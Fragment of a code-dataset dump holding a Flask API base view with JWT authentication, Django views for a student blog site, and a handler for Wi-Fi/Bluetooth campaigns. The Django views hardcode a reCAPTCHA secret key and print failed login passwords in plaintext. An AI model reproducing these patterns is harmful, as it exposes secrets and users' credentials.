"attribute"}, {"api_name": "numpy.NaN", "line_number": 244, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 245, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 
246, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 247, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 248, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 249, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 250, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 251, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 252, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 263, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.invisibility_of_element_located", "line_number": 267, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 267, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 267, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 267, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 269, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 271, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 271, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 271, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 271, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 281, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 281, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 282, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 283, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.invisibility_of_element_located", "line_number": 287, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 287, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 287, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 287, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 290, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 290, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 290, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 290, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 300, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 300, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 300, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 300, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 304, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 313, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 313, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 314, "usage_type": "call"}]} +{"seq_id": "510688513", "text": "import json\nimport mimetypes\nfrom collections import OrderedDict\nfrom copy import 
deepcopy\n\nfrom flask import request, current_app, make_response, stream_with_context\nfrom flask.views import View\nfrom flask_login import UserMixin, current_user\nfrom werkzeug.exceptions import BadRequest\nfrom werkzeug.wrappers import Response\n\nfrom apps.users.jsonwebtoken import JWTError, JSONWebToken\nfrom apps.users.models import User\nfrom extensions import db, login_manager\nfrom .exceptions import (BadRequestError, NotFoundError, AccessDeniedError,\n UnauthorizedError, AppValueError, UnexpectedArguments,\n ModelKeyError)\nfrom .utils import url_for, JSONEncoder, check_kwargs\n\n\nclass BaseAPIView(View):\n methods = ['get', 'post', 'put', 'delete']\n\n __headers = None\n\n current_app = None\n current_user: User = None\n logger = None\n request = None\n json_data = None\n raw_response = False\n file_metadata = None\n\n status = 200\n limit = 30\n next_page = None\n current_page = None\n\n @property\n def offset(self):\n return self.limit * (self.current_page - 1) if self.limit else 0\n\n @property\n def common_args(self):\n return {\n 'limit': self.limit,\n 'offset': self.offset,\n 'sort': self.request.args.get('sort')\n }\n\n def __render(self, data):\n self.add_header('Content-Type', 'application/json; charset=utf-8')\n\n if self.status not in [200, 201]:\n response = data\n else:\n data_exists = False\n if data is not None:\n data_exists = True\n\n if not isinstance(data, list):\n if self.status == 201 and 'url' in data:\n self.add_location_header(data['url'])\n\n data = [data]\n\n if (self.limit and not self.next_page and\n len(data) == self.limit):\n self.next_page = self.current_page + 1\n\n response = OrderedDict({})\n response['links'] = self.__generate_response_links()\n\n if data_exists:\n response['items'] = data\n\n return (json.dumps(response, cls=JSONEncoder), self.status,\n self.__headers)\n\n def __render_file(self, data):\n if self.file_metadata.get('stream', False):\n ctx = data.iter_content(chunk_size=512)\n resp = Response(stream_with_context(ctx))\n else:\n resp = make_response(data)\n\n filename = self.file_metadata['filename']\n ext = '.' 
+ filename.split('.')[-1]\n\n resp.headers['Content-Disposition'] = 'attachment; filename=' + filename\n resp.headers['Content-Type'] = self.file_metadata.get(\n 'content_type', mimetypes.types_map.get(ext)\n )\n\n return resp\n\n def __generate_response_links(self):\n q_params = self.request.args.copy()\n\n links = OrderedDict({})\n links['self'] = self.__build_url(q_params)\n\n if self.limit:\n if self.current_page and self.current_page > 1:\n q_params['page'] = self.current_page - 1\n links['prev'] = self.__build_url(q_params)\n\n if self.next_page:\n q_params['page'] = self.next_page\n links['next'] = self.__build_url(q_params)\n\n return links\n\n def __build_url(self, q_params):\n r = self.request\n base = f'{r.scheme}://{r.host}{r.path}'\n\n if not q_params:\n return base\n\n para = '&'.join([f'{k}={v}' for k, v in q_params.items()])\n return f'{base}?{para}'\n\n def __process_json_data(self):\n data = {}\n\n try:\n json_data = self.request.json or {}\n except BadRequest:\n return data\n\n for key, value in json_data.items():\n func = getattr(self, f'process_{key}_value', None)\n data[key] = func(value) if func else value\n\n return data\n\n def dispatch_request(self, *args, **kwargs):\n self.current_app = current_app\n self.logger = self.current_app.logger\n self.request = request\n self.raw_response = False\n\n method = getattr(self, self.request.method.lower(), None)\n if method is None and self.request.method.lower() == 'head':\n method = getattr(self, 'get', None)\n\n if not method:\n self.status = 405\n return self.__render({'error': 'method not allowed'})\n\n if self.request.method.lower() in ['get', 'head']:\n self.limit = int(self.request.args.get('limit', self.limit))\n self.current_page = int(self.request.args.get('page', 1))\n\n if self.request.method.lower() == 'post':\n self.status = 201\n\n # noinspection PyBroadException\n\n is_error = False\n\n try:\n if current_user.is_authenticated:\n self.current_user = current_user.user\n\n self.json_data = self.__process_json_data()\n\n check_kwargs(method, kwargs)\n data = method(*args, **kwargs)\n db.session.commit()\n\n except (BadRequestError, AppValueError, ModelKeyError) as e:\n self.status = 400\n data = {'error': e.message or 'bad request'}\n is_error = True\n\n except UnauthorizedError as e:\n self.status = 401\n data = {'error': e.message or 'unauthorized'}\n is_error = True\n\n except AccessDeniedError as e:\n self.status = 403\n data = {'error': e.message or 'access denied'}\n is_error = True\n\n except NotFoundError as e:\n self.status = 404\n data = {'error': e.message or 'not found'}\n is_error = True\n\n except UnexpectedArguments:\n self.status = 404\n data = {'error': 'not found'}\n is_error = True\n\n except Exception as e:\n error_text = str(e)\n\n self.logger.error(error_text, exc_info=True)\n\n if not self.current_app.config['DEBUG']:\n error_text = 'unknown error'\n\n self.status = 500\n data = {'error': error_text}\n is_error = True\n\n if not is_error:\n if self.raw_response and isinstance(data, (Response, str)):\n return data\n elif self.file_metadata:\n return self.__render_file(data)\n else:\n db.session.rollback()\n\n return self.__render(data)\n\n def add_header(self, header, value):\n if self.__headers is None:\n self.__headers = {}\n self.__headers[header] = value\n\n def add_location_header(self, url):\n self.add_header('Location', url)\n\n def available_json_data(self, include=None, exclude=None, required=None):\n exclude_columns = {'id_', 'created_date', 'modified_date'}\n exclude_columns -= 
include or set()\n exclude_columns |= exclude or set()\n\n if required:\n for key in required:\n if key not in self.json_data:\n raise BadRequestError\n\n return {k: deepcopy(v) for k, v in self.json_data.items()\n if k not in exclude_columns}\n\n\nclass HealthCheckView(BaseAPIView):\n # noinspection PyMethodMayBeStatic\n def get(self):\n return None\n\n\nclass IndexView(BaseAPIView):\n # noinspection PyMethodMayBeStatic\n def get(self):\n return OrderedDict([\n ('sessions', url_for('general.sessions_view'))\n ])\n\n\n# Flask login stuff\n\nclass CurrentUser(UserMixin):\n user: User = None\n\n def __init__(self, user: User):\n self.user = user\n\n def get_id(self):\n return self.user.id_\n\n\n@login_manager.request_loader\ndef load_user_from_request(req):\n header = req.headers.get('Authorization')\n if not header:\n return None\n\n try:\n token_type, access_token = header.split(' ')\n except ValueError:\n raise BadRequestError('Wrong authorization header')\n\n if token_type.lower() != 'bearer':\n raise BadRequestError('Wrong authorization token type')\n\n jwt = JSONWebToken()\n\n try:\n user = jwt.get_user(access_token)\n except (NotFoundError, JWTError):\n return None\n\n return CurrentUser(user)\n", "sub_path": "src/general/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 8330, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.views.View", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.current_app", "line_number": 26, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 27, "usage_type": "name"}, {"api_name": "apps.users.models.User", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 71, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "utils.JSONEncoder", "line_number": 77, "usage_type": "name"}, {"api_name": "werkzeug.wrappers.Response", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.stream_with_context", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 85, "usage_type": "call"}, {"api_name": "mimetypes.types_map.get", "line_number": 92, "usage_type": "call"}, {"api_name": "mimetypes.types_map", "line_number": 92, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 100, "usage_type": "call"}, {"api_name": "werkzeug.exceptions.BadRequest", "line_number": 129, "usage_type": "name"}, {"api_name": "flask.current_app", "line_number": 139, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 141, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 164, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 164, "usage_type": "name"}, {"api_name": "flask_login.current_user.user", "line_number": 165, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 165, "usage_type": "name"}, {"api_name": "utils.check_kwargs", "line_number": 169, "usage_type": "call"}, {"api_name": "extensions.db.session.commit", "line_number": 171, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 171, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 171, "usage_type": "name"}, {"api_name": "exceptions.BadRequestError", "line_number": 173, 
"usage_type": "name"}, {"api_name": "exceptions.AppValueError", "line_number": 173, "usage_type": "name"}, {"api_name": "exceptions.ModelKeyError", "line_number": 173, "usage_type": "name"}, {"api_name": "exceptions.UnauthorizedError", "line_number": 178, "usage_type": "name"}, {"api_name": "exceptions.AccessDeniedError", "line_number": 183, "usage_type": "name"}, {"api_name": "exceptions.NotFoundError", "line_number": 188, "usage_type": "name"}, {"api_name": "exceptions.UnexpectedArguments", "line_number": 193, "usage_type": "name"}, {"api_name": "werkzeug.wrappers.Response", "line_number": 211, "usage_type": "name"}, {"api_name": "extensions.db.session.rollback", "line_number": 216, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 216, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 216, "usage_type": "name"}, {"api_name": "exceptions.BadRequestError", "line_number": 236, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 238, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 251, "usage_type": "call"}, {"api_name": "utils.url_for", "line_number": 252, "usage_type": "call"}, {"api_name": "flask_login.UserMixin", "line_number": 258, "usage_type": "name"}, {"api_name": "apps.users.models.User", "line_number": 259, "usage_type": "name"}, {"api_name": "apps.users.models.User", "line_number": 261, "usage_type": "name"}, {"api_name": "exceptions.BadRequestError", "line_number": 277, "usage_type": "call"}, {"api_name": "exceptions.BadRequestError", "line_number": 280, "usage_type": "call"}, {"api_name": "apps.users.jsonwebtoken.JSONWebToken", "line_number": 282, "usage_type": "call"}, {"api_name": "exceptions.NotFoundError", "line_number": 286, "usage_type": "name"}, {"api_name": "apps.users.jsonwebtoken.JWTError", "line_number": 286, "usage_type": "name"}, {"api_name": "extensions.login_manager.request_loader", "line_number": 268, "usage_type": "attribute"}, {"api_name": "extensions.login_manager", "line_number": 268, "usage_type": "name"}]} +{"seq_id": "410542832", "text": "from django.shortcuts import render\r\nfrom django.contrib.auth.models import User\r\nfrom django.urls import reverse\r\nfrom django.contrib.auth import authenticate,login,logout\r\nfrom website.models import *\r\nfrom website.forms import *\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.http import HttpResponseRedirect, HttpResponse\r\nimport json\r\nimport requests\r\n\r\n# Create your views here.\r\ndef Home(request):\r\n return render(request,'website/home.html')\r\n\r\n\r\ndef home(request):\r\n return render(request,'website/home1.html')\r\n\r\n\r\ndef spotlight(request):\r\n return render(request,'website/spotlight.html')\r\n\r\n\r\ndef photo(request):\r\n return render(request,'website/dop.html')\r\n\r\ndef literary(request):\r\n objects =PublishUser.objects.order_by('-id')\r\n context = {'lists':objects}\r\n return render(request,'website/literary.html',context)\r\n\r\ndef comming(request):\r\n return render(request,'website/cmg.html')\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef userlogin(request):\r\n if request.user.is_authenticated:\r\n return HttpResponseRedirect(reverse('website:home',))\r\n else:\r\n if request.method == \"POST\":\r\n username = request.POST.get('username')\r\n password = request.POST.get('pass')\r\n user = authenticate(username= username,password=password)\r\n if user:\r\n if user.is_active:\r\n login(request,user)\r\n return HttpResponseRedirect(reverse('website:home'))\r\n 
else:\r\n return HttpResponse(\"Account not active\")\r\n else:\r\n print(\"someone tried to login and failed \")\r\n print(f\"Username :{username} and password :{password}\")\r\n return HttpResponse(\"Invalid login credentials\")\r\n\r\n else:\r\n return render(request,'website/login.html',context={})\r\n\r\n\r\n# @login_required\r\n# def userinfo(request,pk):\r\n# model = User.objects.get(id=pk)\r\n# model1 = model.stories.order_by('-id')\r\n# print(model)\r\n# context = {'objects':model1}\r\n# return render(request,'website/user.html',context)\r\n#\r\n\r\n\r\n@login_required\r\ndef userinfo1(request):\r\n pk = request.user.id\r\n model = User.objects.get(id=pk)\r\n model1 = model.stories.order_by('-id')\r\n print(model)\r\n context = {'objects':model1}\r\n return render(request,'website/user.html',context)\r\n\r\n\r\n@login_required\r\ndef userlogout(request):\r\n logout(request)\r\n return HttpResponseRedirect(reverse('website:home'))\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef registration(request):\r\n registered = False\r\n if request.method == \"POST\":\r\n\r\n\r\n user_form = authenticateform(request.POST)\r\n mgit_form = MgitForms(request.POST)\r\n clientkey = request.POST['g-recaptcha-response']\r\n secretkey = \"6LdW1awZAAAAAAywOAedFlMEXxgwhWACCfPaOHDv\"\r\n sdata = {\r\n 'secret':secretkey,\r\n 'response': clientkey\r\n }\r\n r = requests.post('https://www.google.com/recaptcha/api/siteverify',data=sdata)\r\n response = json.loads(r.text)\r\n verify = response['success']\r\n print(verify)\r\n if verify:\r\n\r\n if user_form.is_valid() and mgit_form.is_valid():\r\n username = user_form.cleaned_data.get('username')\r\n password = user_form.cleaned_data.get('password')\r\n email = user_form.cleaned_data.get('email')\r\n roll = mgit_form.cleaned_data.get('Roll_number')\r\n\r\n print(username,password)\r\n user_obj = User(username=username,password= password,email=email)\r\n mgit_obj = Mgituser(Roll_number=roll)\r\n mgit_obj.user = user_obj\r\n\r\n user_obj.set_password(user_obj.password)\r\n\r\n\r\n user_obj.save()\r\n\r\n mgit_obj.save()\r\n\r\n\r\n registered = True\r\n\r\n context={\"registered\":registered}\r\n\r\n return render(request,'website/signup.html',context)\r\n else:\r\n HttpResponse(user_form.errors)\r\n HttpResponse(mgit_form.errors)\r\n\r\n else:\r\n HttpResponse('')\r\n else:\r\n\r\n context={\"registered\":registered}\r\n return render(request,'website/signup.html',context)\r\n\r\n\r\n\r\n@login_required\r\ndef newposter(request):\r\n if request.method == \"POST\":\r\n clientkey = request.POST['g-recaptcha-response']\r\n secretkey = \"6LdW1awZAAAAAAywOAedFlMEXxgwhWACCfPaOHDv\"\r\n sdata = {\r\n 'secret':secretkey,\r\n 'response': clientkey\r\n }\r\n r = requests.post('https://www.google.com/recaptcha/api/siteverify',data=sdata)\r\n response = json.loads(r.text)\r\n verify = response['success']\r\n print(verify)\r\n if verify:\r\n form = BlogContent1Form(request.POST)\r\n print('hello1')\r\n if form.is_valid():\r\n print('hello2')\r\n\r\n # form.user=user\r\n # form.save()\r\n user1= request.user\r\n\r\n user = User.objects.get(id=user1.id)\r\n # user = request.user.userna\r\n title = form.cleaned_data['title']\r\n story = form.cleaned_data['story']\r\n\r\n\r\n print('hello3')\r\n\r\n form11 = BlogContent11(user=user,title=title,story=story)\r\n\r\n print('hello4')\r\n form11.save()\r\n print('hello5s')\r\n return HttpResponseRedirect(reverse('website:userinfo'))\r\n else:\r\n print(form.errors)\r\n else:\r\n HttpResponse('')\r\n\r\n else:\r\n return 
render(request,'website/newpost.html')\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef publish(request,pk):\r\n content = BlogContent11.objects.get(id=pk)\r\n\r\n print('hello')\r\n if request.method == \"POST\":\r\n print('hello')\r\n author = request.POST['user']\r\n title = request.POST['title']\r\n story = request.POST['story']\r\n model = PublishUser(author=author,title=title,story=story)\r\n model.save()\r\n content = BlogContent11.objects.get(id=pk)\r\n content.publish = True\r\n content.save()\r\n\r\n\r\n return HttpResponseRedirect(reverse('website:literary'))\r\n\r\n\r\ndef comments(request,pk):\r\n if request.method == 'POST':\r\n form = CommentForms( request.POST)\r\n if form.is_valid():\r\n\r\n content = form.cleaned_data['comment']\r\n\r\n user = PublishUser.objects.get(id=pk)\r\n\r\n model = CommentUser(post=user,comment=content)\r\n model.save()\r\n\r\n return HttpResponseRedirect(reverse('website:literary'))\r\n else:\r\n print(form.errors)\r\n return HttpResponse(\"Comment Failed1\")\r\n\r\n else:\r\n return HttpResponse(\"Comment Failed\")\r\n", "sub_path": "mgit/website/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6928, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.shortcuts.render", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 43, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 43, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 48, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 51, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 52, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 54, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 58, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 61, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 77, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 77, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 77, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 81, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 74, "usage_type": "name"}, {"api_name": "django.contrib.auth.logout", "line_number": 86, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 87, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 87, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 84, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 107, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 108, "usage_type": "call"}, {"api_name": 
"django.contrib.auth.models.User", "line_number": 120, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 136, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 138, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 139, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 142, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 146, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 159, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 160, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 173, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 173, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 173, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 186, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 186, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 193, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 150, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 216, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 216, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 231, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 231, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 234, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 237, "usage_type": "call"}]} +{"seq_id": "309463988", "text": "from proximus.config.ClientURISettings import ClientURISettings\nfrom proximus.data.Campaign import Campaign\nfrom proximus.handlers.GenericCampaignDownloader import \\\n GenericCampaignDownloader\nfrom proximus.interfaces.Observer import Observer\nfrom proximus.tools.SystemWriter import SystemWriter\nfrom proximus.tools.XMLUtils import XMLUtils\nimport logging\nimport os\nimport shutil\nfrom proximus.tools.Platform import Platform\nfrom proximus.tools.ProcessExecutor import ProcessExecutor\n\n\nlogger = logging.root\n\nclass CampaignHandler(Observer):\n \"\"\"\n This class exists to check and install (as needed) the appropriate\n campaigns for Wi-F and Bluetooth\n \n It should look at the data and make changes to the filesystem as needed\n \"\"\"\n def __init__(self, mainParent):\n self.mainParent = mainParent\n self.parsedXml = None\n \n self.campaigns = {}\n \n self.wasEmpty = False\n \n self.bluetoothDeployer = None\n self.wifiDeployer = None\n \n self.loadCampaigns()\n \n self.setHotSpotMode()\n \n def setHotSpotMode(self):\n correctActiveCampaign = self.getActiveCampaign(ClientURISettings.MESSAGE_WIFI)\n if (correctActiveCampaign == None):\n logger.info(\"No campaign is active (hotspot)\")\n ProcessExecutor.openCaptiveOrLimitedPortal()\n return\n \n logger.info(\"Loading initial campaign hotspot mode as \" + correctActiveCampaign.wifiCampaign.hotspotMode)\n #CAMPAIGN_NO_INTERNET = 1\n #CAMPAIGN_LIMITED = 2\n #CAMPAIGN_HOTSPOT = 3\n #CAMPAIGN_MOBILOZOPHY = 4\n #CAMPAIGN_FACEBOOK = 5\n if (Platform.getPlatform() == Platform.PLATFORM_LINUX_DREAMPLUG):\n if 
(int(correctActiveCampaign.wifiCampaign.hotspotMode) == int(ClientURISettings.CAMPAIGN_HOTSPOT)):\n ProcessExecutor.openHotspotPortal()\n elif (int(correctActiveCampaign.wifiCampaign.hotspotMode) == int(ClientURISettings.CAMPAIGN_NO_INTERNET)):\n ProcessExecutor.openCaptiveOrLimitedPortal()\n elif (int(correctActiveCampaign.wifiCampaign.hotspotMode) == int(ClientURISettings.CAMPAIGN_LIMITED)):\n ProcessExecutor.openCaptiveOrLimitedPortal()\n elif (int(correctActiveCampaign.wifiCampaign.hotspotMode) == int(ClientURISettings.CAMPAIGN_FACEBOOK)):\n ProcessExecutor.openFacebookPortal()\n else:\n logger.error(\"Not sure what to do with wifi campaign of type \" + correctActiveCampaign.wifiCampaign.hotspotMode)\n else:\n logger.debug(\"Alternate campaign modes not set up for this platform\")\n \n \"\"\" called at startup only to load from filesystem\"\"\"\n def loadCampaigns(self):\n \n logger.info(\"Loading configuration from:\" + ClientURISettings.CAMPAIGNS_FILE)\n if not (os.path.exists(ClientURISettings.CAMPAIGNS_FILE) and os.path.isfile(ClientURISettings.CAMPAIGNS_FILE)):\n return\n try:\n self.parsedXml = XMLUtils.readNodeFromFile(ClientURISettings.CAMPAIGNS_FILE)\n self.parseNode(self.parsedXml)\n except Exception as err:\n logger.error(err)\n \n def saveCampaigns(self):\n if (self.parsedXml != None):\n stringCurrentXML = XMLUtils.elementToString(self.parsedXml)\n stringSavedXML = SystemWriter.readFileToString(ClientURISettings.CAMPAIGNS_FILE)\n if ((stringCurrentXML != stringSavedXML) and (len(stringCurrentXML) > 0)):\n XMLUtils.writeNodeToFile(ClientURISettings.CAMPAIGNS_FILE, self.parsedXml)\n logger.info(\"Campaigns updated on file system\")\n else:\n logger.info(\"Campaigns change not needed\")\n else:\n logger.error(\"Cannot save Campaigns: no data available\")\n \n def notify(self, obj):\n if isinstance(obj, Campaign):\n logger.debug(\"Campaign processed -- not really\")\n \n \"\"\"Return the most recent campaign that is active right this minute\"\"\"\n def getActiveCampaign(self, type):\n activeCampaigns = []\n for campaign in self.campaigns.values():\n if type in campaign.type:\n if campaign.isActive():\n activeCampaigns.append(campaign)\n \n if (len(activeCampaigns) > 0):\n activeCampaignsSorted = sorted(activeCampaigns, key=lambda campaign: campaign.last_modified)\n return activeCampaignsSorted[len(activeCampaigns) - 1]\n\n def getAllCampaignsByType(self, campaignType):\n typedCampaigns = []\n \n for campaign in self.campaigns.values():\n if campaignType == ClientURISettings.MESSAGE_WIFI and campaign.wifiCampaign != None:\n typedCampaigns.append(campaign)\n elif campaignType == ClientURISettings.MESSAGE_BLUETOOTH and campaign.bluetoothCampaign != None:\n typedCampaigns.append(campaign)\n \n return typedCampaigns\n\n def parseNode(self, campaignsNode):\n \n campaigns_changed = False\n \n self.parsedXml = campaignsNode\n \n new_campaigns = {}\n for parsedNode in campaignsNode.findall(\"campaign\"):\n campaign = Campaign(parsedNode)\n new_campaigns[campaign.id] = campaign\n \n # first, if any campaigns are in the old list and not in the new\n # remove them\n for campaign_id in self.campaigns.keys():\n if not new_campaigns.has_key(campaign_id):\n logger.info(\"Removing campaign %s\" % campaign_id)\n del self.campaigns[campaign_id]\n \n campaignFolder = ClientURISettings.CAMPAIGNS_ROOT_DIR + os.sep + campaign_id\n if os.path.isdir(campaignFolder):\n shutil.rmtree(campaignFolder)\n \n campaigns_changed = True\n logger.info(\"Campaign removed: %s\" % campaign_id)\n \n # check each to 
see if it is deployed already or not\n # if not, deploy it\n for (campaign_id, campaign) in new_campaigns.items():\n if not self.campaigns.has_key(campaign_id) or not (self.campaigns[campaign_id] == new_campaigns[campaign_id]):\n self.campaigns[campaign_id] = campaign\n campaigns_changed = True\n logger.info(\"Adding campaign %s\" % campaign_id)\n \n if (campaigns_changed):\n self.loadAllCampaigns()\n self.saveCampaigns()\n \n def loadAllCampaigns(self):\n wiFiCampaigns = self.getAllCampaignsByType(ClientURISettings.MESSAGE_WIFI)\n bTCampaigns = self.getAllCampaignsByType(ClientURISettings.MESSAGE_BLUETOOTH)\n \n if (len(wiFiCampaigns) > 0):\n self.wifiDeployer = GenericCampaignDownloader(ClientURISettings.MESSAGE_WIFI, wiFiCampaigns)\n self.wifiDeployer.start()\n else:\n logger.info(\"No active WI-FI campaign\")\n \n if (len(bTCampaigns) > 0):\n self.bluetoothDeployer = GenericCampaignDownloader(ClientURISettings.MESSAGE_BLUETOOTH, bTCampaigns)\n self.bluetoothDeployer.start()\n else:\n logger.info(\"No active Bluetooth campaign\")\n", "sub_path": "Proximus-2.0-master/ProximusTomorrow/ProximusTomorrow-dreamplugClient/proximus-client/tmp/client/home/proximus/bin/client/proximus/handlers/CampaignHandler.py", "file_name": "CampaignHandler.py", "file_ext": "py", "file_size_in_byte": 7286, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.root", "line_number": 15, "usage_type": "attribute"}, {"api_name": "proximus.interfaces.Observer.Observer", "line_number": 17, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_WIFI", "line_number": 40, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 40, "usage_type": "name"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor.openCaptiveOrLimitedPortal", "line_number": 43, "usage_type": "call"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor", "line_number": 43, "usage_type": "name"}, {"api_name": "proximus.tools.Platform.Platform.getPlatform", "line_number": 52, "usage_type": "call"}, {"api_name": "proximus.tools.Platform.Platform", "line_number": 52, "usage_type": "name"}, {"api_name": 